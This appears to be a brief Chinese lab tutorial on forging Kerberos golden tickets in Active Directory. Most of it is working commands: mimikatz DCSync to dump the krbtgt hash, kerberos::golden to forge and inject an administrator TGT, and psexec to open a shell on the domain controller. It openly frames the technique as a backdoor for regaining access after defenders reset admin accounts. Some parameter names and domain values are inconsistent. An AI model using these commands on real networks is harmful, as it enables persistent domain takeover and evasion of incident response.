黄金票据(golden ticket):伪造票据授予票据(TGT),也被称为认证票据。
krbtgt账户:每个域控制器都有一个“krbtgt”的用户账户,是KDC的服务账户,用来创建票据授予服务(TGS)加密的密钥。
0x00 金票据利用条件:
- 域控中krbtgt账户NTLM密码哈希
- 域中的sid值
- 一台域中主机
与其说是一种攻击方式,不如说是一种后门,当域控权限掉后,再重新获取权限,因为常见的在域中管理员知道自己被入侵了 往往只是简单的修改域管的账号 恰恰krbtgt缺被忽略…
0X01 过程
域控08 r2 ip:192.168.117.3
域内主机08 r2 ip:192.168.117.111
1. 在域控中利用mimikatz导出 krbtgt 的ntlm hash
lsadump::dcsync /domain:top.pentest.top /user:krbtgt"
mimikatz.exe privilege::debug "lsadump::dcsync /domain:top.pentest.top /user:krbtgt" exit >> log.txt
2. 获取域的sid,在域成员机中whoami /user 注:不需要末尾的4个数字1128 那只是账号的标识符 比如administrator后面为500
3. 使用mimikazt执行
一次性
mimikatz.exe "kerberos::golden /user:administrator /domain:top.pentest.top /sid:S-1-5-21-2174377853-1962599352-171107088 /krbtgt:ae8366a5c4ba8d4b9932fbb20c6c0b1d /ptt" exit
多步骤
mimikatz # kerberos::purge
mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-2174377853-1962599352-171107088 /krbtgt:ae8366a5c4ba8d4b9932fbb20c6c0b1d /ticket:Administrator.kiribi
mimikatz # kerberos::ptt Administrator.kiribi
mimikatz # kerberos::tgt
参数解析:
kerberos::golden:创建黄金票据
user:administrator伪造的用户
domain域名:top.pentest.top
sid:id域中sid
krbtft:hash在域控中导出的hash
ppt:将伪造的票据插入到内存中以供使用
还可以直接获取一个域控的CMD
psexec.exe \\WIN-CKTOM35R6U0 cmd
0X02 总结:
1: 域成员机不能为03与xp及一下 否则mimikatz导入票据时会出错
2: 最后连接为域控计算机全名 不能为IP地址
学习借鉴:https://blog.csdn.net/ws13129/article/details/89648576